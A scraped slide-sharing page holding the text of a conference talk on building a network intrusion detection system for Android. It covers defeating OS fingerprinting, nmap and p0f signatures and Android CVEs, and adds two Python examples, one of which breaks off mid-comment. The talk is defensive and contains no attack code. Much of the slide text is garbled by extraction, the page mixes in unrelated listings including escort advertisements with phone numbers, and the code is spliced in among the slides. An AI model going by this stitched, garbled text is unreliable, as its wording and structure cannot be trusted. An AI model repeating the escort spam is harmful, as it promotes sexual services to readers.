The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 

Kürzlich hochgeladen (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 

ANDROIDS: MOBILE SECURITY RELOADED

  • 2. WHO I AM
  - Passionate about computer security.
  - Computer Engineering degree and an Executive MBA.
  - I'm from Spain; we're sexy and you know it.
  - You can follow my adventures at @segofensiva or on my blog http://www.seguridadofensiva.com
  - Other conferences: RootedCON in Spain, Nuit Du Hack in Paris, Black Hat Arsenal in USA, Defcon in USA, ...
  JAIME SÁNCHEZ (@SEGOFENSIVA) - DEEPSEC
  • 3. BUILDING AN ANDROID IDS ON NETWORK LEVEL - MOTIVATIONS
  - Smartphones have evolved into sophisticated, compact minicomputers.
  - They store sensitive/private information and services.
  - Smartphone usage is on the rise.
  - They are susceptible to various PC-like types of attacks.
  - The importance of security mechanisms is not yet understood.
  - Security mechanisms are not sufficient.
  - Variety of platforms.
  DEFCON 21 - DEEPSEC
  • 4. WHY ANDROID?
  - Being popular is not always a good thing.
  - Mobile malware and threats are clearly on the rise.
  - Over 100 million Android phones shipped in the second quarter of 2012 alone.
  - Targets this large are difficult for attackers to resist!
  • 5. THE PLATFORM
  - Android has inherited powerful base systems from the Linux kernel, such as memory management, multitasking and file management.
  - Android is a platform which embraces numerous technologies like the Linux kernel, C++, Java, Dalvik VM, etc.
  - Android has a process-unit component model and provides system functions as server processes. For a functional mesh-up of processes, it provides Binder.
  - Why has a new mechanism been developed, rather than using the IPC mechanisms such as sockets and pipes provided by Linux? Because of performance.
  • 6. SECURITY ARCHITECTURE
  - Android seeks to be the most secure and usable operating system for mobile platforms by re-purposing traditional operating system security controls to: protect user data; protect system resources (including the network); provide application isolation.
  - To achieve these objectives, Android provides these key security features: robust security at the OS level through the Linux kernel; a mandatory application sandbox for all applications; secure interprocess communication; application signing; application-defined and user-granted permissions.
  - Each component assumes that the components below are properly secured.
  • 7. THE PROBLEM? There is a massive growth in the volume of malware families and samples ... Google Play's track record with malware is not too good (Bouncer can be compromised) ...
  • 9. Known vulnerabilities by Android version:
  - Android v1.0: CVE-2009-0475 (Remote code execution), CVE-2009-0606 (Privilege Escalation), CVE-2009-0607 (Multiple Integer Overflows), CVE-2009-0608 (Integer Overflow), CVE-2009-1895 (Privilege Escalation), CVE-2009-1754 (Access to Sensitive Information), CVE-2009-2348 (Access to Camera and Record Audio), CVE-2009-2656 (DoS through SMS), CVE-2009-2999 (DoS through SMS), CVE-2009-3698 (DoS through Dalvik API), CVE-2009-1185 (Privilege Escalation), CVE-2009-1186 (DoS through udev)
  - Android v2.0: CVE-2009-1442 (Code Execution), CVE-2010-EASY (Privilege Escalation), CVE-2009-2692 (Privilege Escalation), CVE-2010-1807 (WebKit Privilege Escalation), CVE-2010-1119 (WebKit Privilege Escalation), CVE-2011-1149 (Privilege Escalation), CVE-2011-3975 (Access to Sensitive Information), CVE-2011-2357 (Cross-Application Scripting), CVE-2011-0680 (Access to Sensitive Information), CVE-2011-2344 (Gain Privileges and Access Pictures), CVE-2011-1823 (Code Execution)
  - Android v3.0: CVE-2010-4804 (Information Disclosure), CVE-2011-1823 (Privilege Escalation), CVE-2011-0640 (Code Execution), CVE-2011-1349 (DoS), CVE-2011-1350 (Privilege Escalation), CVE-2011-1352 (Privilege Escalation), CVE-2011-2343 (Access to Sensitive Information), CVE-2011-3874 (Privilege Escalation), CVE-2011-2357 (Bypass Permissions)
  • 10. Dirty USSD; poor SSL/TLS implementations; kernel-mode driver exploits; NFC vulnerabilities; Android Master Key; ... !!! METERPRETER FOR ANDROID !!!
  • 11. Mobile Pwn2Own 2013
  - One exploit took advantage of two Chrome-on-Nexus 4 vulnerabilities: an integer overflow that affects Chrome and another Chrome vulnerability that resulted in a full sandbox escape and the possibility of remote code execution on the affected device.
  - Two exploits compromised apps that are installed on all Samsung Galaxy S4 devices.
  • 13. [Diagram: Android device (eth0: WiFi, rmnet0: 3G) -> VPN tunnel -> gateway running snort and tcpdump -> Internet]
  - In order to analyze the traffic flows we'll create a VPN tunnel between our Android device and our computer.
  - The VPN tunnel uses digital certificates (public/private key pair) to authenticate the client and the server.
  - Using digital certificates instead of a shared key gives higher flexibility; for instance, we can revoke access if the smartphone is lost.
  • 14.
  - Once the VPN tunnel is established and the traffic is being sent to the VPS, we can start monitoring the traffic with snort.
  - We will take advantage of two main signature sets: the official rules (the registered-version rules) and the Emerging Threats rules.
  - We can also use tools like tcpdump to capture traffic for later analysis.
  - Wireshark gives a much better view of the content and the qualities of each IP datagram or TCP segment.
  • 17.
  - OSfooler is a practical approach presented at Black Hat Arsenal USA 2013.
  - It can be used to detect and defeat active and passive remote OS fingerprinting from tools like nmap, p0f or commercial appliances.
  • 18. FROM KERNEL SPACE TO USER HEAVEN - How I met your packet - NMAP INTERNAL PROBES
  Fingerprint Linux 2.6.17 - 2.6.24
  Class Linux | Linux | 2.6.X | general purpose
  SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U)
  OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C)
  WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018)
  ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=)
  T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
  T2(R=N)
  T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=)
  T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
  T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
  T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
  T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
  U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
  IE(DFI=N%T=3B-45%TG=40%CD=S)
  Most important tests:
  - TCP ISN greatest common divisor (GCD)
  - TCP IP ID sequence generation algorithm (TI)
  - TCP timestamp option algorithm (TS)
  - TCP options (O, O1-O6)
  - TCP initial window size (W, W1-W6)
  - Responsiveness (R)
  - IP don't-fragment bit (DF)
  - IP initial time-to-live guess (TG)
  Although there are others:
  - TCP ISN counter rate (ISR)
  - ICMP IP ID sequence generation algorithm (II)
  - Shared IP ID sequence Boolean (SS)
  - Don't Fragment ICMP (DFI)
  - Explicit congestion notification (CC)
  - TCP miscellaneous quirks (Q)
  - TCP sequence number (S)
  - etc.
  NUIT DU HACK 2013 - DEEPSEC
  • 19. OSFOOLER: REMOTE OS FINGERPRINTING IS OVER - P0F SIGNATURES
  8192:32:1:48:M*,N,N,S:.:Windows:98
  The fields of the signature, in order:
  - Window size: xxx constant value; * any value; %nnn multiple of nnn; Sxx multiple of the MSS; Txx multiple of the MTU
  - Initial TTL
  - DF bit
  - Packet size
  - TCP options and their order: N = NOP; E = EOL; Wnnn = window scale; Mnnn = MSS; S = SACK permitted; T / T0 = timestamp (T0: zero timestamp); ?n = unknown option n
  - Quirks: data in SYN packets; options after EOL; IP ID field = 0; ACK different from 0; unusual flags; incorrect options decode
  - Operating system: family and version
  BLACKHAT ARSENAL USA 2013 - DEEPSEC
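The p0f v2 signature layout from slide 19, as an added Python example (not the author's or p0f's own code): it parses a signature line into its fields and matches a constructed SYN against it, covering the S/T/% window forms and the M*/W* option wildcards described on the slide. The MAX_HOPS tolerance, the ObservedSyn record and the second (Linux) signature are assumptions of this example.

```python
"""Parse p0f v2 SYN signatures (wwww:ttt:D:ss:OOO...:QQ:OS:Details) and match
an observed SYN against them. Example code; not part of p0f or ANDROIDS."""
from dataclasses import dataclass, field
from typing import List, Optional

# Quirk letters for the quirks named on the slide (p0f v2 semantics)
QUIRKS = {
    "D": "data in SYN packet",
    "P": "options after EOL",
    "Z": "IP ID field = 0",
    "A": "ACK number different from 0",
    "F": "unusual flags (PUSH, URG, ...)",
    "!": "incorrect options decode",
}


@dataclass
class P0fSignature:
    window: str         # "8192", "*" any, "%64" multiple, "S4" 4*MSS, "T2" 2*MTU
    ttl: int            # initial TTL
    df: bool            # DF bit set
    size: str           # total SYN size, or "*"
    options: List[str]  # option layout in order: N, E, Wnnn/W*, Mnnn/M*, S, T, T0, ?n
    quirks: List[str]   # quirk letters; "." in the signature means none
    os_family: str
    os_version: str


def parse_signature(line: str) -> P0fSignature:
    parts = line.strip().split(":")
    if len(parts) != 8:
        raise ValueError(f"expected 8 fields, got {len(parts)}: {line!r}")
    window, ttl, df, size, opts, quirks, family, version = parts
    if df not in ("0", "1"):
        raise ValueError(f"DF field must be 0 or 1: {df!r}")
    unknown = set(quirks) - set(QUIRKS) - {"."}
    if unknown:
        raise ValueError(f"unknown quirk letters {sorted(unknown)}")
    return P0fSignature(window, int(ttl), df == "1", size,
                        opts.split(",") if opts else [],
                        [] if quirks == "." else list(quirks), family, version)


@dataclass
class ObservedSyn:
    """What a sensor extracts from one captured SYN (constructed for this example)."""
    window: int
    ttl: int
    df: bool
    size: int
    options: List[str]          # normalised like the signature: "M1460", "N", "S", "W0", "T"
    mss: Optional[int] = None   # MSS option value, if present
    mtu: Optional[int] = None   # link MTU, if known (needed for "Txx" windows)
    quirks: List[str] = field(default_factory=list)


MAX_HOPS = 30  # assumption of this example: the SYN crossed at most 30 routers


def window_matches(spec: str, syn: ObservedSyn) -> bool:
    if spec == "*":
        return True
    if spec.startswith("%"):
        return syn.window % int(spec[1:]) == 0
    if spec.startswith("S"):
        return syn.mss is not None and syn.window == int(spec[1:]) * syn.mss
    if spec.startswith("T"):
        return syn.mtu is not None and syn.window == int(spec[1:]) * syn.mtu
    return syn.window == int(spec)


def options_match(spec: List[str], observed: List[str]) -> bool:
    """Option kinds must appear in the same order; 'M*' / 'W*' accept any MSS / WS value."""
    if len(spec) != len(observed):
        return False
    return all((s.endswith("*") and o.startswith(s[0])) or s == o
               for s, o in zip(spec, observed))


def ttl_matches(initial_ttl: int, observed_ttl: int) -> bool:
    # The observed TTL can only be at or below the initial value, within MAX_HOPS of it
    return 0 <= initial_ttl - observed_ttl <= MAX_HOPS


def match_syn(syn: ObservedSyn, signatures: List[P0fSignature]) -> Optional[str]:
    """Return 'Family Version' of the first signature matching the SYN, else None."""
    for sig in signatures:
        if (window_matches(sig.window, syn)
                and ttl_matches(sig.ttl, syn.ttl)
                and sig.df == syn.df
                and (sig.size == "*" or int(sig.size) == syn.size)
                and options_match(sig.options, syn.options)
                and set(sig.quirks) == set(syn.quirks)):
            return f"{sig.os_family} {sig.os_version}"
    return None


# The slide's signature plus a constructed one using the "S" (multiple of MSS) window form
SIGNATURES = [parse_signature(s) for s in (
    "8192:32:1:48:M*,N,N,S:.:Windows:98",
    "S4:64:1:60:M*,S,T,N,W0:.:Linux:2.6 (constructed example)",
)]

if __name__ == "__main__":
    syn = ObservedSyn(window=8192, ttl=27, df=True, size=48, options=["M1460", "N", "N", "S"])
    print(match_syn(syn, SIGNATURES))  # Windows 98
```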
  • 20. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
  • 22. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
  • 23. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
  • 24. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
  • 25. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 26. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  • 27. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 28. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 29. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
  • 30. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
  • 32. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 33. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 34. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 35. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 36. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 37. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 38. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 39. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 40. REMOTE OS FINGERPRINTING
    - Detect and drop packets sent by well-known scanning tools.
    - nmap OS fingerprinting works by sending up to 16 TCP, UDP and ICMP probes to known open and closed ports of the target machine:
      - Sequence generation (SEQ, OPS, WIN & T1)
      - ICMP echo (IE)
      - TCP explicit congestion notification (ECN)
      - TCP T2-T7
      - UDP
    - Several of these probes carry flag combinations a real TCP stack never sends (T2: no flags, T3: SYN+FIN+PSH+URG, T7: FIN+PSH+URG), so they can be matched and dropped packet by packet without keeping connection state.
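The flag-combination checks from slides 39 and 40, as an added example that is not code from the talk: a small parser for raw IPv4/TCP packets, a rule table for the flag shapes that never occur in legitimate traffic (named after the nmap probes that use them, per the nmap OS-detection documentation), and the DROP / report / iptables outcomes that correspond to the reactive actions on slide 35. The packet builder, addresses and ports are constructed for the example; checksums are left at zero because the parser does not verify them.

```python
"""Added example, not code from the talk: flag-combination checks a sensor can run
over raw IPv4/TCP packets. Covers the SYN+FIN+PSH+URG packet from slide 39 and the
TCP probe shapes nmap uses for OS detection (slide 40)."""
import struct
from dataclasses import dataclass

# TCP flag bits, low six bits of the offset/flags word.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


@dataclass
class TcpView:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int
    window: int


def parse_ipv4_tcp(frame: bytes) -> TcpView:
    """Minimal parser: an IPv4 header (options allowed) followed by a TCP header."""
    if frame[0] >> 4 != 4 or frame[9] != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (frame[0] & 0x0F) * 4
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    sport, dport, _seq, _ack, off_flags, window = struct.unpack(
        "!HHIIHH", frame[ihl:ihl + 16])
    return TcpView(src, dst, sport, dport, off_flags & 0x3F, window)


# Flag combinations that never occur in a legitimate TCP conversation. The probe
# names follow the nmap OS-detection documentation: T2 sends no flags, T3 sends
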